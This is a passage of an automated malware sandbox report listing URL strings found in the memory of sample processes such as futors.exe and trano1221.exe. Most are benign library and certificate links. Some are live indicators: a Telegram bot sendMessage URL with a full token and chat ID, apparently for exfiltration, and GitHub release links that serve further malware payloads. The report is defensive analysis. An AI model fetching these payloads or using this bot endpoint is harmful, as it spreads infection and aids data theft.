00000023.00000003.1585164780.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                                      Source: trano1221.exe, 0000002A.00000003.1886267544.000001E16BC1F000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000002.1965623740.000001E16C65F000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1807134122.000001E16BC19000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1787595180.000001E16C604000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1779310228.000001E16BBEB000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1804953038.000001E16C600000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1883113833.000001E16BC1F000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1835417852.000001E16C61E000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1880210684.000001E16BC1A000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1837399560.000001E16C638000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1840930520.000001E16C65D000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1857007046.000001E16C65D000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1838314051.000001E16C64F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.firmaprofesional.com/cps0
                                      Source: trano1221.exe, 0000002A.00000003.1886267544.000001E16BC1F000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1807134122.000001E16BC19000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000002.1946483979.000001E16BAEA000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1885930845.000001E16BAE8000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1804418435.000001E16BA5F000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1883113833.000001E16BC1F000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000002.1970356972.000001E16CE30000.00000004.00001000.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1806059046.000001E16BAE5000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1880210684.000001E16BC1A000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1883906457.000001E16BAE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/assignments/character-sets
                                      Source: trano1221.exe, 0000002A.00000003.1839066325.000001E16BB73000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1776610520.000001E16BB41000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1806684147.000001E16BB72000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1831815877.000001E16BB73000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1804418435.000001E16BB41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
                                      Source: trano1221.exe, 0000002A.00000003.1655158924.000001E16B5D5000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1667863628.000001E16B58E000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1656139769.000001E16B567000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1658799975.000001E16B53F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/time-zones/repository/tz-link.html
                                      Source: m0wsoI3.exe, 00000011.00000002.1518652176.0000000000681000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1530953936.000000000FF93000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1518652176.000000000066A000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1530707992.000000000FE10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.com0
                                      Source: trano1221.exe, 0000002A.00000003.1655158924.000001E16B5D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.phys.uu.nl/~vgent/calendar/isocalendar.htm
                                      Source: trano1221.exe, 0000002A.00000003.1787595180.000001E16C604000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1804953038.000001E16C600000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1857850675.000001E16C602000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1893642016.000001E16C604000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps
                                      Source: trano1221.exe, 0000002A.00000002.1941933794.000001E16B4E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps0
                                      Source: trano1221.exe, 0000002A.00000003.1806325089.000001E16B51C000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1810044236.000001E16B648000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1807329895.000001E16B5F1000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1888416044.000001E16B6C7000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1815209048.000001E16B6C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wwwsearch.sf.net/):
                                      Source: UD49QH6.exe, 00000010.00000003.1447534913.0000000005C6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                                      Source: UD49QH6.exe, 00000010.00000003.1447534913.0000000005C6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                                      Source: UD49QH6.exe, 00000010.00000003.1421639776.0000000005B99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org?q=
                                      Source: powershell.exe, 0000001D.00000002.4028270818.000001D880001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                                      Source: powershell.exe, 00000019.00000002.1586419592.0000000004871000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBDr
                                      Source: trano1221.exe, 0000002A.00000002.1970356972.000001E16CDD0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7591910367:AAEZrF_Cuy7JK2ZDu8tT43dHO_5Hk80CLJ0/sendMessage
                                      Source: trano1221.exe, 0000002A.00000002.1970356972.000001E16CE38000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7591910367:AAEZrF_Cuy7JK2ZDu8tT43dHO_5Hk80CLJ0/sendMessage?chat_id=71057
                                      Source: trano1221.exe, 00000023.00000003.1609766960.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://blog.jaraco.com/skeleton
                                      Source: UD49QH6.exe, 00000010.00000003.1450202345.0000000005B74000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.
                                      Source: UD49QH6.exe, 00000010.00000003.1462695917.0000000005B73000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696491991400800003.1&ci=1696491991993.12791&cta
                                      Source: UD49QH6.exe, 00000010.00000003.1421639776.0000000005B99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                                      Source: UD49QH6.exe, 00000010.00000003.1421639776.0000000005B99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                                      Source: UD49QH6.exe, 00000010.00000003.1421639776.0000000005B99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                                      Source: UD49QH6.exe, 00000010.00000003.1450202345.0000000005B74000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
                                      Source: UD49QH6.exe, 00000010.00000003.1450202345.0000000005B74000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                                      Source: powershell.exe, 00000019.00000002.1600308325.00000000058D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                                      Source: powershell.exe, 00000019.00000002.1600308325.00000000058D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                                      Source: powershell.exe, 00000019.00000002.1600308325.00000000058D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                                      Source: trano1221.exe, 00000023.00000003.1603415387.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cryptography.io
                                      Source: trano1221.exe, 00000023.00000003.1603415387.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cryptography.io/
                                      Source: trano1221.exe, 00000023.00000003.1603415387.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cryptography.io/en/latest/changelog/
                                      Source: trano1221.exe, 00000023.00000003.1603415387.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cryptography.io/en/latest/installation/
                                      Source: trano1221.exe, 00000023.00000003.1603415387.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cryptography.io/en/latest/security/
                                      Source: trano1221.exe, 0000002A.00000003.1806325089.000001E16B51C000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1643957026.000001E16B639000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1655158924.000001E16B593000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1655061017.000001E16B639000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1813939975.000001E16B562000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1646562116.000001E16B596000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1658799975.000001E16B59D000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1683030296.000001E16B58E000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1822586944.000001E16B5A9000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1715210481.000001E16B596000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1672685606.000001E16B53F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64
                                      Source: trano1221.exe, 0000002A.00000003.1618691073.000001E16B2B1000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000002.1933157269.000001E16AE60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filename
                                      Source: trano1221.exe, 0000002A.00000003.1618691073.000001E16B2B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_code
                                      Source: trano1221.exe, 0000002A.00000003.1618691073.000001E16B2B1000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000002.1933157269.000001E16AE60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_source
                                      Source: trano1221.exe, 0000002A.00000003.1618691073.000001E16B2B1000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000002.1933157269.000001E16AEE8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.is_package
                                      Source: trano1221.exe, 0000002A.00000003.1618691073.000001E16B2B1000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000002.1933157269.000001E16AEE8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.create_module
                                      Source: trano1221.exe, 0000002A.00000003.1618691073.000001E16B2B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_module
                                      Source: trano1221.exe, 0000002A.00000003.1618691073.000001E16B2B1000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000002.1933157269.000001E16AE60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_caches
                                      Source: trano1221.exe, 0000002A.00000003.1618691073.000001E16B2B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_spec
                                      Source: trano1221.exe, 0000002A.00000003.1811281205.000001E169697000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1836271125.000001E16969C000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000002.1924598134.000001E1696A1000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1888194813.000001E16969C000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1618691073.000001E16B2B1000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1629342002.000001E169689000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1891421330.000001E16969D000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1815054639.000001E16969B000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1627401291.000001E1696A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_data
                                      Source: trano1221.exe, 00000023.00000003.1609766960.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.metadata.html
                                      Source: trano1221.exe, 0000002A.00000003.1880697620.000001E16B9FE000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1857175982.000001E16B9F7000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1816650813.000001E16B9EC000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1804418435.000001E16B9B5000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1832695924.000001E16B9ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/multiprocessing.html
                                      Source: trano1221.exe, 00000023.00000003.1609766960.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/reference/import.html#finders-and-loaders
                                      Source: UD49QH6.exe, 00000010.00000003.1421639776.0000000005B99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                                      Source: UD49QH6.exe, 00000010.00000003.1421639776.0000000005B99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabv20
                                      Source: UD49QH6.exe, 00000010.00000003.1421639776.0000000005B99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                                      Source: UD49QH6.exe, 00000010.00000003.1421639776.0000000005B99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
                                      Source: futors.exe, 0000000F.00000003.1632617370.000000000150B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/
                                      Source: futors.exe, 0000000F.00000003.1811877759.0000000003F80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Milidmdds/45rgffdgd/releases/download/fdgdf/crypted.7.exe
                                      Source: trano1221.exe, 0000002A.00000003.1807134122.000001E16BC19000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1779310228.000001E16BBEB000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1880210684.000001E16BC1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Ousret/charset_normalizer
                                      Source: powershell.exe, 0000001D.00000002.4028270818.000001D88022C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                                      Source: trano1221.exe, 0000002A.00000003.1811281205.000001E169697000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1836271125.000001E16969C000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000002.1924598134.000001E1696A1000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1888194813.000001E16969C000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1618691073.000001E16B2B1000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1629342002.000001E169689000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1891421330.000001E16969D000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000002.1939610283.000001E16B2B4000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1815054639.000001E16969B000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1627401291.000001E1696A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
                                      Source: trano1221.exe, 00000023.00000003.1609766960.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/astral-sh/ruff
                                      Source: futors.exe, 0000000F.00000003.1963918863.0000000003F7D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/legendary99999/bbbdfbfdb/releases/download/bbbbbbfff/mrwipre12.exeJ
                                      Source: futors.exe, 0000000F.00000003.1632617370.0000000001524000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/legendary99999/dfsfsdfsd/rel
                                      Source: futors.exe, 0000000F.00000003.1632617370.0000000001524000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/legendary99999/dfsfsdfsd/relH
                                      Source: futors.exe, 0000000F.00000003.1632617370.0000000001524000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/legendary99999/dfsfsdfsd/releases/download/dsfsdfdfsfsd/cronikxqqq.exe
                                      Source: futors.exe, 0000000F.00000003.1632617370.0000000001524000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/legendary99999/dfsfsdfsd/releases/download/dsfsdfdfsfsd/cronikxqqq.exe1
                                      Source: futors.exe, 0000000F.00000003.1632617370.0000000001524000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/legendary99999/dfsfsdfsd/releases/download/dsfsdfdfsfsd/cronikxqqq.exe1pE:
                                      Source: futors.exe, 0000000F.00000003.1632617370.0000000001524000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/legendary99999/dfsfsdfsd/releases/download/dsfsdfdfsfsd/cronikxqqq.exee1
                                      Source: futors.exe, 0000000F.00000003.1632617370.0000000001524000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/legendary99999/dfsfsdfsd/releases/download/dsfsdfdfsfsd/cronikxqqq.exee163
                                      Source: futors.exe, 0000000F.00000003.1632617370.0000000001524000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/legendary99999/dfsfsdfsd/releases/download/dsfsdfdfsfsd/cronikxqqq.exee1638nD
                                      Source: futors.exe, 0000000F.00000003.1632617370.0000000001524000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/legendary99999/dfsfsdfsd/releases/download/dsfsdfdfsfsd/cronikxqqq.exeh
                                      Source: futors.exe, 0000000F.00000003.1632617370.0000000001524000.00000004.00000020.00020000.00000000.sdmp, futors.exe, 0000000F.00000003.1632617370.00000000014DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/legendary99999/gdsgdsggds/releases/download/dsffdsdfs/trano1221.exe
                                      Source: futors.exe, 0000000F.00000003.1404032504.000000000157F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/legendary99999/gdsgdsggds/releases/download/dsffdsdfs/trano1221.exe2
                                      Source: futors.exe, 0000000F.00000003.1632617370.000000000150B000.00000004.00000020.00020000.00000000.sdmp, futors.exe, 0000000F.00000003.1632617370.00000000014DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/legendary99999/gdsgdsggds/releases/download/dsffdsdfs/trano1221.exee
                                      Source: futors.exe, 0000000F.00000003.1632617370.00000000014DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/legendary99999/gdsgdsggds/releases/download/dsffdsdfs/trano1221.exefe3f6-b
                                      Source: futors.exe, 0000000F.00000003.1632617370.00000000014DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/legendary99999/gdsgdsggds/releases/download/dsffdsdfs/trano1221.exefe3f6748f0f227
                                      Source: futors.exe, 0000000F.00000003.1632617370.00000000014DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/legendary99999/gdsgdsggds/releases/download/dsffdsdfs/trano1221.exefe3f67nb
                                      Source: futors.exe, 0000000F.00000003.1632617370.00000000014DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/legendary99999/gdsgdsggds/releases/download/dsffdsdfs/trano1221.exefe3f8b
                                      Source: trano1221.exe, 00000023.00000003.1608803599.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1608559838.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1613878589.0000013C2C3F5000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1614097963.0000013C2C3F5000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1613878589.0000013C2C402000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1582872658.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000002.1973720785.00007FF98B765000.00000004.00000001.01000000.0000003A.sdmp, trano1221.exe, 0000002A.00000002.1974119123.00007FF98B799000.00000004.00000001.01000000.00000038.sdmpString found in binary or memory: https://github.com/mhammond/pywin32
                                      Source: trano1221.exe, 00000023.00000003.1603415387.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pyca/cryptography
                                      Source: trano1221.exe, 00000023.00000003.1603415387.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pyca/cryptography/
                                      Source: trano1221.exe, 00000023.00000003.1603415387.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pyca/cryptography/actions?query=workflow%3ACI
                                      Source: trano1221.exe, 00000023.00000003.1603415387.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pyca/cryptography/issues
                                      Source: trano1221.exe, 00000023.00000003.1603415387.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pyca/cryptography/workflows/CI/badge.svg?branch=main
                                      Source: trano1221.exe, 0000002A.00000002.1949395926.000001E16BD20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/pypa/packaging
                                      Source: trano1221.exe, 0000002A.00000002.1950520854.000001E16C45C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/python-pillow/Pillow/
                                      Source: trano1221.exe, 0000002A.00000003.1618691073.000001E16B2B1000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000002.1933157269.000001E16AEE8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
                                      Source: trano1221.exe, 0000002A.00000003.1627401291.000001E1696A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
                                      Source: trano1221.exe, 0000002A.00000003.1811281205.000001E169697000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1836271125.000001E16969C000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000002.1924598134.000001E1696A1000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1888194813.000001E16969C000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1618691073.000001E16B2B1000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1629342002.000001E169689000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1891421330.000001E16969D000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000002.1939610283.000001E16B2B4000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1815054639.000001E16969B000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1627401291.000001E1696A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
                                      Source: trano1221.exe, 0000002A.00000003.1832765232.000001E16B2EC000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1657678255.000001E16B960000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000002.1940534889.000001E16B33C000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1817006737.000001E16B2E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/issues/86361.
                                      Source: trano1221.exe, 00000023.00000003.1609766960.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/importlib_metadata
                                      Source: trano1221.exe, 00000023.00000003.1609766960.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/importlib_metadata/actions/workflows/main.yml/badge.svg
                                      Source: trano1221.exe, 00000023.00000003.1609766960.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/importlib_metadata/actions?query=workflow%3A%22tests%22
                                      Source: trano1221.exe, 00000023.00000003.1609766960.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/importlib_metadata/issues
                                      Source: trano1221.exe, 0000002A.00000003.1811281205.000001E169697000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1836271125.000001E16969C000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000002.1924598134.000001E1696A1000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1888194813.000001E16969C000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1618691073.000001E16B2B1000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1629342002.000001E169689000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1891421330.000001E16969D000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000002.1939610283.000001E16B2B4000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1815054639.000001E16969B000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1627401291.000001E1696A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
                                      Source: trano1221.exe, 0000002A.00000003.1776610520.000001E16BA5F000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1882675982.000001E16BAB0000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1817319257.000001E16BA97000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1804418435.000001E16BA5F000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1806576447.000001E16BA95000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1858813276.000001E16BAAF000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1832985559.000001E16BAAE000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1841513745.000001E16BAAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.
